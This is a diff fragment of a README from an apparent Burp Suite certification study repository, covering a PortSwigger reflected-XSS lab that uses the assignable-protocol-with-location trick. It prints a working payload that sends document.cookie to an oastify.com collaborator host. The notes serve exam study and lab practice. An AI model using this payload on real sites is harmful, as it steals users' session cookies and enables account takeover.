botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ### XSS Assign protocol

 >Lab to test XSS into HTML context with nothing encoded in search function.
 Using this lab to test the **Assignable protocol with location** ```javascript``` identified by [PortSwigger XSS research](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#assignable-protocol-with-location).
+In the payload is the ```%0a``` representing the ASCII newline character.

 ```html
 <script>location.protocol='javascript';</script>#%0adocument.location='http://0xyjdsa2etgbxef5lwgj5rj6mxsoge43.oastify.com/?p='+document.cookie//&context=html